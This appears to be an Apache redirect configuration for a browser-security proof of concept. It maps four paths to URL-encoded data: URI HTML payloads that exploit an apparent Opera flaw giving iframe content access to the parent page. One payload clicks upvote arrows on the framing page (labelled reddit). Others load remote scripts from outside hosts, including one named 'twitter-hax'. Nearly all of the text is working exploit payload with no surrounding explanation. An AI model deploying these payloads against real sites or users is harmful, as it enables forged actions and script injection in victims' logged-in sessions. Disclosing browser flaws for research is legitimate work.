redirect 301 /sec/opera/data-uri-same-domain/reddit data:text/html,%3Cscript%3Ex%3Dtop.document.body.firstChild.contentWindow%3Bx.%24(%22.arrow.up%22).click()%3Bx.%24(%22.arrow%22).remove()%3C%2Fscript%3E
redirect 301 /sec/opera/data-uri-same-domain/attacker data:text/html,%3Cscript%20src%3D%22http%3A%2F%2Fwww.billyreisinger.com%2Fjash%2Fsource%2Flatest%2FJash.js%22%3E%3C%2Fscript%3E%3Ch1%3EThis%20page%20is%20a%20data%3A%20URI%20in%20an%20iframe%20originally%20pointing%20to%20an%20external%20domain%3C%2Fh1%3E%3Cp%3EYou%20can%20enter%20JavaScript%20code%20in%20the%20console%20provided.%20Notice%20that%20in%20Opera%2C%20you%20have%20full%20access%20to%20the%20%3Ccode%3Eparent%3C%2Fcode%3E%20object.%3C%2Fp%3E
redirect 301 /sec/opera/data-uri-same-domain/simple-jash data:text/html,%3Cscript%20src%3D%22http%3A%2F%2Fwww.billyreisinger.com%2Fjash%2Fsource%2Flatest%2FJash.js%22%3E%3C%2Fscript%3E
redirect 301 /sec/opera/data-uri-same-domain/twitter-hax data:text/html,%3Cscript%20src%3D%22http%3A%2F%2Fcode.eligrey.com%2Fsec%2Fopera%2Fdata-uri-same-domain%2Ftwitter-hax.js%22%3E%3C%2Fscript%3E
